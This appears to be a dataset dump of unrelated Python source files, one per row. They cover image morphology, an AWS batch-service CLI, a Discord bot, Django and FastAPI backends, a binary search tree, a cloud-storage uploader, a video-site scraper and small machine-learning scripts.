text stringlengths 38 1.54M |
|---|
import numpy as np
import scipy.misc as misc
import matplotlib.pyplot as plt
disc_se = np.array([[False, True, False], [True, True, True], [False, True, False]], dtype=np.bool)
def dilation(binary_img, structure_element=disc_se):
dialated = np.zeros_like(binary_img)
cent_y = structure_element.shape[0] // 2
cent_x = structure_element.shape[1] // 2
for y in range(binary_img.shape[0]):
for x in range(binary_img.shape[1]):
if binary_img[y, x]:
for sy in range(structure_element.shape[0]):
for sx in range(structure_element.shape[1]):
if structure_element[sy, sx]:
safe_set(dialated, y + sy - cent_y, x + sx - cent_x, 255)
return dialated
def erosion(binary_img, structure_element=disc_se):
erosed = np.zeros_like(binary_img)
cent_y = structure_element.shape[0] // 2
cent_x = structure_element.shape[1] // 2
for y in range(binary_img.shape[0]):
for x in range(binary_img.shape[1]):
if binary_img[y, x] and erosion_check(binary_img, y, x, structure_element, cent_y, cent_x):
erosed[y, x] = 255
return erosed
def opening(binary_img, structure_element=disc_se):
return dilation(erosion(binary_img,structure_element), structure_element)
def closing(binary_img, structure_element=disc_se):
return erosion(dilation(binary_img, structure_element), structure_element)
def hit_and_miss_transform(binary_img, j, k):
return intersection(erosion(binary_img, j), erosion(complement(binary_img), k))
def complement(binary_img):
comp = np.zeros_like(binary_img, np.uint8)
for y in range(binary_img.shape[0]):
for x in range(binary_img.shape[1]):
comp[y, x] = 255 - binary_img[y, x]
return comp
def intersection(img1, img2):
intersect = np.zeros_like(img1, np.uint8)
for y in range(img1.shape[0]):
for x in range(img1.shape[1]):
intersect[y, x] = 255 if img1[y, x] and img2[y, x] else 0
return intersect
def erosion_check(binary_img, y, x, structure_element, cent_y, cent_x):
for sy in range(structure_element.shape[0]):
for sx in range(structure_element.shape[1]):
if structure_element[sy, sx] and not safe_get(binary_img, y + sy - cent_y, x + sx - cent_x):
return False
return True
def safe_set(img, y, x, val):
if 0 <= y < img.shape[0] and 0 <= x < img.shape[1]:
img[y, x] = val
def safe_get(img, y, x):
if 0 <= y < img.shape[0] and 0 <= x < img.shape[1]:
return img[y, x]
return 0
def threshold(image, t=128):
thresholded_img = np.zeros_like(image)
for y in range(image.shape[0]):
for x in range(image.shape[1]):
if image[y, x] >= t:
thresholded_img[y, x] = 255
return thresholded_img
if __name__ == '__main__':
lena = misc.imread('lena.bmp')
thresholded_lena = threshold(lena)
dilated_lena = dilation(thresholded_lena)
misc.imsave('dilated.png', dilated_lena)
erosed_lena = erosion(thresholded_lena)
misc.imsave('erosed.png', erosed_lena)
opened_lena = opening(thresholded_lena)
misc.imsave('opened.png', opened_lena)
closed_lena = closing(thresholded_lena)
misc.imsave('closed.png', closed_lena)
j = np.array([[False, False, False], [True, True, False], [False, True, False]], dtype=np.bool)
k = np.array([[False, True, True], [False, False, True], [False, False, False]], dtype=np.bool)
ham_lena = hit_and_miss_transform(thresholded_lena, j, k)
misc.imsave('hit_and_miss.png', ham_lena)
|
#!/usr/bin/env python
# Copyright (c) 2006-2008 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from optparse import OptionParser
from boto.services.servicedef import ServiceDef
from boto.services.submit import Submitter
from boto.services.result import ResultProcessor
import boto
import sys, os
from boto.compat import StringIO
class BS(object):
Usage = "usage: %prog [options] config_file command"
Commands = {'reset' : 'Clear input queue and output bucket',
'submit' : 'Submit local files to the service',
'start' : 'Start the service',
'status' : 'Report on the status of the service buckets and queues',
'retrieve' : 'Retrieve output generated by a batch',
'batches' : 'List all batches stored in current output_domain'}
def __init__(self):
self.service_name = None
self.parser = OptionParser(usage=self.Usage)
self.parser.add_option("--help-commands", action="store_true", dest="help_commands",
help="provides help on the available commands")
self.parser.add_option("-a", "--access-key", action="store", type="string",
help="your AWS Access Key")
self.parser.add_option("-s", "--secret-key", action="store", type="string",
help="your AWS Secret Access Key")
self.parser.add_option("-p", "--path", action="store", type="string", dest="path",
help="the path to local directory for submit and retrieve")
self.parser.add_option("-k", "--keypair", action="store", type="string", dest="keypair",
help="the SSH keypair used with launched instance(s)")
self.parser.add_option("-l", "--leave", action="store_true", dest="leave",
help="leave the files (don't retrieve) files during retrieve command")
self.parser.set_defaults(leave=False)
self.parser.add_option("-n", "--num-instances", action="store", type="string", dest="num_instances",
help="the number of launched instance(s)")
self.parser.set_defaults(num_instances=1)
self.parser.add_option("-i", "--ignore-dirs", action="append", type="string", dest="ignore",
help="directories that should be ignored by submit command")
self.parser.add_option("-b", "--batch-id", action="store", type="string", dest="batch",
help="batch identifier required by the retrieve command")
def print_command_help(self):
print('\nCommands:')
for key in self.Commands.keys():
print(' %s\t\t%s' % (key, self.Commands[key]))
def do_reset(self):
iq = self.sd.get_obj('input_queue')
if iq:
print('clearing out input queue')
i = 0
m = iq.read()
while m:
i += 1
iq.delete_message(m)
m = iq.read()
print('deleted %d messages' % i)
ob = self.sd.get_obj('output_bucket')
ib = self.sd.get_obj('input_bucket')
if ob:
if ib and ob.name == ib.name:
return
print('delete generated files in output bucket')
i = 0
for k in ob:
i += 1
k.delete()
print('deleted %d keys' % i)
def do_submit(self):
if not self.options.path:
self.parser.error('No path provided')
if not os.path.exists(self.options.path):
self.parser.error('Invalid path (%s)' % self.options.path)
s = Submitter(self.sd)
t = s.submit_path(self.options.path, None, self.options.ignore, None,
None, True, self.options.path)
print('A total of %d files were submitted' % t[1])
print('Batch Identifier: %s' % t[0])
def do_start(self):
ami_id = self.sd.get('ami_id')
instance_type = self.sd.get('instance_type', 'm1.small')
security_group = self.sd.get('security_group', 'default')
if not ami_id:
self.parser.error('ami_id option is required when starting the service')
ec2 = boto.connect_ec2()
if not self.sd.has_section('Credentials'):
self.sd.add_section('Credentials')
self.sd.set('Credentials', 'aws_access_key_id', ec2.aws_access_key_id)
self.sd.set('Credentials', 'aws_secret_access_key', ec2.aws_secret_access_key)
s = StringIO()
self.sd.write(s)
rs = ec2.get_all_images([ami_id])
img = rs[0]
r = img.run(user_data=s.getvalue(), key_name=self.options.keypair,
max_count=self.options.num_instances,
instance_type=instance_type,
security_groups=[security_group])
print('Starting AMI: %s' % ami_id)
print('Reservation %s contains the following instances:' % r.id)
for i in r.instances:
print('\t%s' % i.id)
def do_status(self):
iq = self.sd.get_obj('input_queue')
if iq:
print('The input_queue (%s) contains approximately %s messages' % (iq.id, iq.count()))
ob = self.sd.get_obj('output_bucket')
ib = self.sd.get_obj('input_bucket')
if ob:
if ib and ob.name == ib.name:
return
total = 0
for k in ob:
total += 1
print('The output_bucket (%s) contains %d keys' % (ob.name, total))
def do_retrieve(self):
if not self.options.path:
self.parser.error('No path provided')
if not os.path.exists(self.options.path):
self.parser.error('Invalid path (%s)' % self.options.path)
if not self.options.batch:
self.parser.error('batch identifier is required for retrieve command')
s = ResultProcessor(self.options.batch, self.sd)
s.get_results(self.options.path, get_file=(not self.options.leave))
def do_batches(self):
d = self.sd.get_obj('output_domain')
if d:
print('Available Batches:')
rs = d.query("['type'='Batch']")
for item in rs:
print(' %s' % item.name)
else:
self.parser.error('No output_domain specified for service')
def main(self):
self.options, self.args = self.parser.parse_args()
if self.options.help_commands:
self.print_command_help()
sys.exit(0)
if len(self.args) != 2:
self.parser.error("config_file and command are required")
self.config_file = self.args[0]
self.sd = ServiceDef(self.config_file)
self.command = self.args[1]
if hasattr(self, 'do_%s' % self.command):
method = getattr(self, 'do_%s' % self.command)
method()
else:
self.parser.error('command (%s) not recognized' % self.command)
if __name__ == "__main__":
bs = BS()
bs.main()
|
from enum import Enum
class OdinEnum(Enum):
"""Enumeration Class for OdinEnum
This enumeration class instructs all enumeration objects inheriting from it
to show their value when they are requested to be printed to the standard
output.
"""
def __str__(self):
return self.value
|
import discord
from discord.ext import commands
class Node:
def __init__(self, question, emoji):
self.question = question
self.emoji = emoji
self.children = []
def add_children(self, *children):
for child in children:
self.children.append(child)
def get_node(self, question):
list = self.create_list()
for node in list:
if node.question == question:
return node
raise Exception("There is no node with this question in this tree!")
def create_list(self, list=[]):
list.append(self)
for child in self.children:
child.create_list(list)
return list
def print_tree(self):
print(self.question)
for child in self.children:
child.print_tree()
root = Node(':one: Comment rejoindre le serveur MC?\n:two: Comment devenir builder officiel?', None)
second = Node('Il faut déjà être builder officiel!', '1\N{VARIATION SELECTOR-16}\N{COMBINING ENCLOSING KEYCAP}')
third = Node("Il faut constuire 2 bâtiments en solo.", '2\N{VARIATION SELECTOR-16}\N{COMBINING ENCLOSING KEYCAP}')
root.add_children(second, third)
class HelpBuilding(commands.Cog):
def __init__(self, client):
self.client = client
async def add_emojis(self, message, node):
for child in node.children:
try:
await message.add_reaction(child.emoji)
except discord.errors.HTTPException:
print(f"Emoji {child.emoji} not found!")
@commands.command(brief='[WIP] Aide type FAQ en cours de création')
async def build(self, ctx):
if ctx.channel.type != discord.ChannelType.private:
await ctx.send(f"{ctx.author.mention}, regarde tes MPs! :mailbox:")
message = await ctx.author.send(embed=discord.Embed(description=root.question))
await self.add_emojis(message, root)
@commands.command(brief='Trouve le nom d\'une emoji')
@commands.check_any(commands.is_owner())
async def emojiname(self, ctx, emoji):
await ctx.author.send(emoji.encode('ascii', 'namereplace'))
@commands.Cog.listener()
async def on_reaction_add(self, reaction, user):
if reaction.message.channel.type == discord.ChannelType.private and not user.bot:
try:
node = root.get_node(reaction.message.embeds[0].description)
except Exception:
return
for child in node.children:
if child.emoji == reaction.emoji:
message = await reaction.message.channel.send(embed=discord.Embed(type='rich', description=child.question))
await self.add_emojis(message, child)
break
def setup(client):
client.add_cog(HelpBuilding(client))
|
list1 = ['apple', 'orange', 'pear']
print([i[0].upper() for i in list1])
list2 = ['apple', 'orange', 'pear']
print([i for i in list2 if i.count('p') > 0])
list3 = ["TA_parth", "student_poohbear",
"TA_michael", "TA_guido", "student_htiek"]
print([i[3:] for i in list3 if i.startswith('TA_')])
list4 = ['apple', 'orange', 'pear']
print([{i, len(i)} for i in list4])
list5 = ['apple', 'orange', 'pear']
print({i: len(i) for i in list5})
|
from django.db import models
from django.contrib.auth.models import User
from saekki_pro import settings
from django.contrib.postgres.fields import ArrayField
# 약속게시물
class Promise(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
title = models.CharField(max_length=200)
created_at = models.DateTimeField(auto_now_add=True)
content = models.TextField()
setting_date_time = models.CharField(max_length=200)
pre_party = ArrayField(models.CharField(max_length=15), default=list, null=True, blank=True)
acpt_party = ArrayField(models.CharField(max_length=15), default=list, null=True, blank=True)
# 벌칙 관련
# 벌칙 종류 (0:벌칙 없읍, '벌금': 벌금, '엽사': 엽사)
what_betting = models.CharField(max_length=30, default='0', null=True, blank=True)
# 벌금 기준 (0:기본, '시간': 시간당, '한번': 1회)
per_or_one = models.CharField(max_length=30, default='0', null=True, blank=True)
per_min_money = models.CharField(max_length=255, default='100', null=True, blank=True)
setting_min = models.CharField(max_length=50, default='1', null=True, blank=True)
onetime_panalty = models.CharField(max_length=50, default='0', null=True, blank=True)
# 경도
longitud = models.FloatField(null=True, blank=True, default=None)
# 위도
latitude = models.FloatField(null=True, blank=True, default=None)
# 종료되었는지 여부
end = models.PositiveSmallIntegerField(default=0)
# 마감임박
soon = models.CharField(max_length=10, null=True)
def __str__(self):
return self.title
# 약속게시물 내 댓글
class Promise_Comment(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
promise = models.ForeignKey(Promise, on_delete=models.CASCADE, related_name="comments")
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
# 친구 model
class Friend(models.Model):
users = models.ManyToManyField(settings.AUTH_USER_MODEL)
current_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='owner', null=True, on_delete=models.CASCADE)
@classmethod
def make_friend(cls, current_user, new_friend):
friend, created = cls.objects.get_or_create(
current_user = current_user
)
friend.users.add(new_friend)
@classmethod
def lose_friend(cls, current_user, new_friend):
friend, created = cls.objects.get_or_create(
current_user = current_user
)
friend.users.remove(new_friend)
# 도착여부를 확인하기위한 모델
class Party_detail(models.Model):
promise = models.ForeignKey(Promise, related_name='party_detail', null=True, on_delete=models.CASCADE)
user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)
# 벌금
penalty = models.CharField(max_length=200, default='0', null=True, blank=True)
# 수락여부
acpt = models.PositiveSmallIntegerField(default=0) # 1 : 수락 , 2 : 거절
# 성공여부
success_or_fail = models.PositiveSmallIntegerField(default=0)
arrived_time = models.DateTimeField(null=True, blank=True, default=None)
# 엽사(배팅) 모델
class Fun_Image(models.Model):
user = models.ForeignKey(Party_detail, related_name='fun', null=True, on_delete=models.CASCADE)
# 엽사
fun_image = models.ImageField(blank=True, null=True, upload_to="promise_fun_tmp")
# 친구신청 알림 모델
class Notification_friend(models.Model):
send_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='firend_send_user', null=True, on_delete=models.CASCADE)
receive_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='firend_receive_user', null=True, on_delete=models.CASCADE)
# 약속,댓글 알림 모델
class Notification_promise(models.Model):
send_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='promise_send_user', null=True, on_delete=models.CASCADE)
receive_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='promise_receive_user', null=True, on_delete=models.CASCADE)
promise = models.ForeignKey(Promise, related_name='promise_noti', null=True, on_delete=models.CASCADE)
com_or_pro = models.CharField(max_length=1, null=True)
class Notification_penalty(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='penalty_user', null=True, on_delete=models.CASCADE)
promise = models.ForeignKey(Promise, related_name='penalty_promise', null=True, on_delete=models.CASCADE)
penalty = models.CharField(max_length=200, default='0')
final = models.CharField(max_length=5, default='0')
|
class Node:
def __init__(self, value):
self.left = None
self.right = None
self.value = value
class BinarySearchTree:
def __init__(self):
self.root = None
def insert(self, value):
new_node = Node(value)
if self.root == None:
self.root = new_node
else:
current_node = self.root
while True:
if value < current_node.value:
#left
if current_node.left == None:
current_node.left = new_node
break
current_node = current_node.left
else:
#right
if current_node.right == None:
current_node.right = new_node
break
current_node = current_node.right
def lookup(self, value):
if self.root == None:
return 'The value: {0} Not found.'.format(value)
current_node = self.root
while current_node != None:
if value < current_node.value:
current_node = current_node.left
elif value > current_node.value:
current_node = current_node.right
elif value == current_node.value:
return 'Value: {0} is available.'.format(current_node.value)
return 'The value: {0} Not found.'.format(value)
def remove(self, value):
if self.root == None:
return None
current_node = self.root
parent_node = None
while current_node != None:
if value < current_node.value:
parent_node = current_node
current_node = current_node.left
elif value > current_node.value:
parent_node = current_node
current_node = current_node.right
elif value == current_node.value:
#we have match get to work
#option 1: no right child
if current_node.right == None:
if parent_node == None:
self.root = current_node.left
else:
# if parent > current_value, make #current left child a child of the root
if current_node.value < parent_node.value:
parent_node.left = current_node.left
#if parent < current_value, make left child a child of the right
elif current_node.value > parent_node.value:
parent_node.right = current_node.left
#Option 2: Right child which doesnt have a #left child
elif current_node.right.left == None:
current_node.right.left = current_node.left
if parent_node == None:
self.root = current_node.right;
else:
#if parent > current, make right child #of the left the parent
if current_node.value < parent_node.value:
parent_node.left = current_node.right
#if parent < current, make right child #a right child of the parent
elif current_node.value > parent_node.value:
parent_node.right = current_node.right
else:
#find the Right child's left most child
leftmost = current_node.right.left
leftmostParent = current_node.right
while(leftmost.left != None):
leftmostParent = leftmost
leftmost = leftmost.left
#Parent's left subtree is now leftmost's #right subtree
leftmostParent.left = leftmost.right
leftmost.left = current_node.left
leftmost.right = current_node.right
if parent_node == None:
self.root = leftmost
else:
if current_node.value < parent_node.value:
parent_node.left = leftmost
elif current_node.value > parent_node.value:
parent_node.right = leftmost
return True
def tranverse(self, node):
tree = node.value
if node.left == None:
tree.left = None
else:
self.traverse(node.left)
if tree.right == None:
tree.right = None
else:
tree.right = self.traverse(node.right);
return tree
tree = BinarySearchTree()
tree.insert(9)
tree.insert(4)
tree.insert(6)
tree.insert(20)
tree.insert(170)
tree.insert(15)
tree.insert(1)
t = tree.remove(15)
print(t)
s = tree.lookup(15)
print(s)
|
"""
simple reporter utilities for SMC
"""
import numpy as np
from jax.lax import stop_gradient
import jax
from jax.ops import index, index_add, index_update
from jax import numpy as jnp
from jax.config import config; config.update("jax_enable_x64", True)
class BaseSMCReporter(object):
"""
generalized reporter object for SMC
"""
def __init__(self,
T,
N,
Dx,
save_Xs=True):
self.X = jnp.zeros((T,N,Dx))
self.nESS = jnp.zeros(T)
self.logW = jnp.zeros((T,N))
self.save_Xs=save_Xs
def report(self, t, reportables):
"""
arguments
reportables : tuple
"""
# X, logZ, nESS = reportables
# self.X[t] = X
# self.logZ[t] = logZ
# self.nESS[t] = nESS
pass
class vSMCReporter(BaseSMCReporter):
"""
reporter object for vSMC
"""
def __init__(self, T, N, Dx, save_Xs=True):
super().__init__(T,N,Dx,save_Xs)
def report(self, t,reportables):
"""
arguments
reportables: tuple
X, logZ, nESS
"""
X, logW, nESS = reportables
if self.save_Xs:
self.X = index_update(self.X, index[t,:], stop_gradient(X))
self.logW = index_update(self.logW, index[t], stop_gradient(logW))
self.nESS = index_update(self.nESS, index[t], stop_gradient(nESS))
|
"""Programatically interact with a Google Cloud Storage bucket."""
from pip._internal import main as pipmain
from os import environ
import os
try:
from google.cloud import storage
except ModuleNotFoundError:
pipmain(['install', 'google-cloud-storage'])
from google.cloud import storage
bucketName = environ.get('spotifair')
bucketFolder = environ.get('Song')
localFolder = environ.get('file')
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "Spotifair-df3788c7a929.json"
storage_client = storage.Client()
bucket = storage_client.get_bucket('spotifair')
def upload_files(bucketName, bucketFolder, localFolder, name):
"""Upload files to GCP bucket."""
blob = bucket.blob(bucketFolder +'/' + name)
blob.upload_from_filename(localFolder + name)
return f'Uploaded {name} to "{bucketName}" bucket.'
def list_files(bucketName):
"""List all files in GCP bucket."""
files = bucket.list_blobs(prefix=bucketFolder)
fileList = [file.name for file in files if '.' in file.name]
return fileList
def download_random_file(bucketName, bucketFolder, localFolder, name):
"""Download random file from GCP bucket."""
fileList = list_files(bucketName)
for i in range(len(fileList)):
#print(fileList[i], str(name))
if fileList[i] == str(name):
song = i
break
blob = bucket.blob(fileList[song])
fileName = blob.name.split('/')[-1]
blob.download_to_filename(localFolder + fileName)
return f'{fileName} downloaded from bucket.'
|
from typing import List
from fastapi import Depends, FastAPI, HTTPException
from sqlalchemy.orm import Session
from src import models, schemas, crud
from src.database import engine, SessionLocal
models.Base.metadata.create_all(bind=engine)
app = FastAPI()
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
# Product Type
@app.post("/product_type/", response_model=schemas.ProductType)
def create_product_type(product_type: schemas.ProductTypeCreate, db: Session = Depends(get_db)):
db_product_type = crud.get_product_type_by_name(db, name=product_type.name)
if db_product_type:
raise HTTPException(status_code=400, detail="Name already occupied")
return crud.create_product_type(db=db, product_type=product_type)
@app.get("/product_types/", response_model=List[schemas.ProductType])
def read_product_types(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
product_types = crud.get_product_types(db, skip=skip, limit=limit)
return product_types
@app.get("/product_type/name/{product_type_name}", response_model=schemas.ProductType)
def read_product_type_by_name(product_type_name: str, db: Session = Depends(get_db)):
db_product_type = crud.get_product_type_by_name(db, name=product_type_name)
if db_product_type is None:
raise HTTPException(status_code=404, detail="Product type not found")
return db_product_type
@app.get("/product_type/id/{product_type_id}", response_model=schemas.ProductType)
def read_product_type(product_type_id: int, db: Session = Depends(get_db)):
db_product_type = crud.get_product_type_by_id(db, product_type_id=product_type_id)
if db_product_type is None:
raise HTTPException(status_code=404, detail="Product type not found")
return db_product_type
# Product
@app.post("/product/", response_model=schemas.Product)
def create_product(product: schemas.ProductCreate, db: Session = Depends(get_db)):
db_product = crud.get_product_by_name(db, name=product.name)
if db_product:
raise HTTPException(status_code=400, detail="Name already occupied")
return crud.create_product(db=db, product=product)
@app.get("/products/", response_model=List[schemas.Product])
def read_products(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
products = crud.get_products(db, skip=skip, limit=limit)
return products
@app.get("/product/name/{product_name}", response_model=schemas.Product)
def read_product_by_name(product_name: str, db: Session = Depends(get_db)):
db_product = crud.get_product_by_name(db, name=product_name)
if db_product is None:
raise HTTPException(status_code=404, detail="Product not found")
return db_product
@app.get("/product/id/{product_id}", response_model=schemas.Product)
def read_product(product_id: int, db: Session = Depends(get_db)):
db_product = crud.get_product(db, product_id=product_id)
if db_product is None:
raise HTTPException(status_code=404, detail="Product not found")
return db_product
# Transaction
@app.post("/transaction/", response_model=schemas.Transaction)
def create_transaction(transaction: schemas.TransactionCreate, db: Session = Depends(get_db)):
return crud.create_transaction(db=db, transaction=transaction)
@app.get("/transactions/", response_model=List[schemas.Transaction])
def read_transactions(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
transactions = crud.get_transactions(db, skip=skip, limit=limit)
return transactions
@app.get("/transactions/recipient/{recipient_code}", response_model=schemas.Transaction)
def read_transactions_by_recipient(recipient: str, db: Session = Depends(get_db)):
db_transactions = crud.get_transactions_by_recipient(db, recipient=recipient)
if db_transactions is None:
raise HTTPException(status_code=404, detail="Transactions not found")
return db_transactions
@app.get("/transaction/id/{transaction_id}", response_model=schemas.Transaction)
def read_transaction(transaction_id: int, db: Session = Depends(get_db)):
db_transaction = crud.get_transaction(db, transaction_id=transaction_id)
if db_transaction is None:
raise HTTPException(status_code=404, detail="Transaction not found")
return db_transaction
# Cart
@app.post("/cart/", response_model=schemas.Cart)
def create_cart(cart: schemas.CartCreate, db: Session = Depends(get_db)):
return crud.create_cart(db=db, cart=cart)
@app.get("/cart/transaction/{transaction_id}", response_model=schemas.Cart)
def read_cart_by_transaction(transaction_id: int, db: Session = Depends(get_db)):
db_cart = crud.get_cart_by_transaction(db, transaction_id=transaction_id)
if db_cart is None:
raise HTTPException(status_code=404, detail="Cart not found")
return db_cart
@app.get("/cart/product/{product_id}", response_model=schemas.Cart)
def read_cart_by_product(product_id: int, db: Session = Depends(get_db)):
db_cart = crud.get_cart_by_product_id(db, product_id=product_id)
if db_cart is None:
raise HTTPException(status_code=404, detail="Cart not found")
return db_cart
@app.get("/cart/id/{cart_id}", response_model=schemas.Cart)
def read_transaction(cart_id: int, db: Session = Depends(get_db)):
db_cart = crud.get_cart(db, cart_id=cart_id)
if db_cart is None:
raise HTTPException(status_code=404, detail="Cart not found")
return db_cart
|
#《TF Girls 修炼指南》第四期
# 正式开始机器学习
# 首先我们要确定一个目标: 图像识别
# 我这里就用Udacity Deep Learning的作业作为辅助了
# 1. 下载数据 http://ufldl.stanford.edu/housenumbers/
# 2. 探索数据
# 3. 处理数据
# 4. 构建一个基本网络, 基本的概念+代码 , TensorFlow的世界
# 5. 卷积ji
# 6. 来实验吧
# 7. 微调与结果
|
"""
URL patterns for personal app
"""
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^portfolio$', views.portfolio, name='portfolio'),
url(r'^about$', views.about, name='about'),
]
|
from clint.textui import progress
from django.core.management.base import BaseCommand
from django.db.models import Count
from shapes.models import MaterialShape
from normals.tasks import auto_rectify_shape
class Command(BaseCommand):
args = ''
help = 'Auto-rectify all shapes'
def handle(self, *args, **options):
ids = MaterialShape.objects.filter(correct=True, planar=True) \
.exclude(rectified_normal__automatic=True) \
.filter(rectified_normals__automatic=False) \
.annotate(c=Count('rectified_normals')) \
.filter(c__gt=0) \
.order_by('-num_vertices') \
.values_list('id', flat=True)
for id in progress.bar(ids):
auto_rectify_shape.delay(id)
|
__author__ = 'Vit'
from bs4 import BeautifulSoup
from urllib.parse import unquote
from data_format.url import URL
from data_format.fl_data import FLData
from common.util import _iter, quotes, psp
from interface.view_manager_interface import ViewManagerFromModelInterface
from model.site.parser import BaseSiteParser
class YPData(FLData):
def __init__(self, url: URL, part: str):
super().__init__(url, '')
self.part=part
class SexixSite(BaseSiteParser):
@staticmethod
def can_accept_url(url: URL) -> bool:
return url.contain('sexix.net/')
@staticmethod
def create_start_button(view:ViewManagerFromModelInterface):
view.add_start_button(picture_filename='model/site/resource/sexis.png',
url=URL("http://sexix.net/?orderby=date*"))
def get_shrink_name(self):
return 'SXX'
def parse_thumbs(self, soup: BeautifulSoup, url: URL):
for thumbnail in _iter(soup.find_all('div', {'class': 'thumb'})):
href = URL(thumbnail.a.attrs['href'], base_url=url)
description = thumbnail.a.img.attrs['alt']
thumb_url = URL(thumbnail.img.attrs['src'], base_url=url)
self.add_thumb(thumb_url=thumb_url, href=href, popup=description,
labels=[{'text': description, 'align': 'bottom center'}])
def get_pagination_container(self, soup: BeautifulSoup) -> BeautifulSoup:
return soup.find('div',{'class':'wp-pagenavi'})
def parse_thumbs_tags(self, soup: BeautifulSoup, url: URL):
cloud=soup.find('div', {'class':'tagcloud'})
tags=dict()
for href in _iter(cloud.find_all('a')):
tag_href=href.attrs['href']
label=href.string
if '/videotag/' in tag_href:
tags[label]=URL(tag_href)
for label in sorted(tags):
self.add_tag(label,tags[label])
def parse_video(self, soup: BeautifulSoup, url: URL):
video_container=soup.find('div',{'class':'videoContainer'})
if video_container:
# psp(video_container)
source_file=URL(video_container.iframe.attrs['src'], base_url=url,referer=url)
filedata=FLData(source_file,'')
self._result_type = 'video'
self.model.loader.start_load_file(filedata,self.continue_parse_video)
def continue_parse_video(self, fldata:FLData):
playlist_file=URL(quotes(fldata.text, "jwplayer().load('", "'")+'*')
filedata = FLData(playlist_file, '')
self.model.loader.start_load_file(filedata, self.continue_parse_video2)
def continue_parse_video2(self, fldata:FLData):
playlist=BeautifulSoup(fldata.text.replace('jwplayer:source','jjj'), "html.parser")
for item in playlist.find_all('jjj'):
# psp(unquote(str(item)))
if item.attrs.get('file',''):
video_url=URL(unquote(str(item.attrs['file'])))
label=item.attrs['label']
self.add_video(label,video_url)
self.generate_video_view()
def parse_video_tags(self, soup: BeautifulSoup, url: URL):
info=soup.find('div',{'id':'info'})
for href in _iter(info.find_all('a')):
tag_href=href.attrs['href']
label=href.string
if '/videotag/' in tag_href:
self.add_tag(label,URL(tag_href))
if __name__ == "__main__":
pass
|
#!/usr/bin/python
#File name: if.py
number = 23
guess = int(input('Enter an integer:'))
if guess == number:
print ('Congurations, you guessed it.')
print ('But you do not win any prizes!')
elif guess < number:
print ('No, it is a litter higher than that')
else:
print ('No, it is a litter lower than that')
print ('Done') |
import pandas as pd
import numpy as np
from sklearn.experimental import enable_hist_gradient_boosting
from sklearn.ensemble import HistGradientBoostingClassifier
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import cross_val_score
amino_acids = np.array(['R', 'H' ,'K' ,'D' ,'E' ,'S' ,'T' ,'N' ,'Q' ,'C' ,'U' ,'G' ,'P' ,'A' ,'I' ,'L' ,'M' ,'F' ,'W' ,'Y' ,'V'])
train_data = pd.read_csv('./datasets/train.csv')
test_data = pd.read_csv('./datasets/test.csv')
def feature_processing(data):
X = []
enc = OneHotEncoder()
enc.fit(amino_acids.reshape(-1, 1))
for row in data.values:
seq = np.array(list(row[0]))
seq_onehot = enc.transform(seq.reshape(-1, 1)).toarray().ravel()
X.append(seq_onehot)
return X
X_train = feature_processing(train_data)
y_train = train_data['Active'].values
X_test = feature_processing(test_data)
clf = HistGradientBoostingClassifier(l2_regularization=1.0, learning_rate=0.15, max_iter=200, max_leaf_nodes=150, min_samples_leaf=50, scoring='f1')
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
score = cross_val_score(clf, X_train, y_train, cv=5, scoring='f1').mean()
print(score)
y_pred_df = pd.DataFrame(y_pred)
y_pred_df.to_csv('sub.csv', index=False, header=False)
|
from codecs import open
from re import findall, sub, IGNORECASE
import sys
with open('../transcript.txt', 'r') as f:
lines = f.readlines()
search_patterns = [None] * len(lines)
for i, line in enumerate(lines):
line = line.strip()
line = sub(r'[\wą-ž]', r'\g<0>[~`^]?', line)
line = sub(r' ', r'[\s:;,]+', line)
line = sub(r'$', r'[\.:;\?!,]*', line)
search_patterns[i] = line
with open('__final_1.txt', 'r') as f:
text = f.read()
with open('../transcript_stressed_updated.txt', 'r') as f:
res = f.readlines()
for i, p in enumerate(search_patterns):
f = findall(p, text, IGNORECASE)
if f:
f = list(set(f))
f.sort(key=len, reverse=True)
line = sub('[\r\n]', ' ', f[0])
line = sub(' +', ' ', line)
res[i] = line + '\n'
print(line)
#with open('../transcript_stressed_v3.txt', 'w') as f:
# f.writelines(res)
|
# from django.contrib.auth.models import User
from django.http import Http404
# from django.shortcuts import render
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.views import APIView
from django.contrib.auth.models import User
from .models import Client, Talent
from .serializers import ClientSerializer, TalentSerializer, UserSerializer
class UserClientViewSet(viewsets.ModelViewSet):
serializer_class = ClientSerializer
queryset = Client.objects.all()
class ClientList(APIView):
def get(self, request):
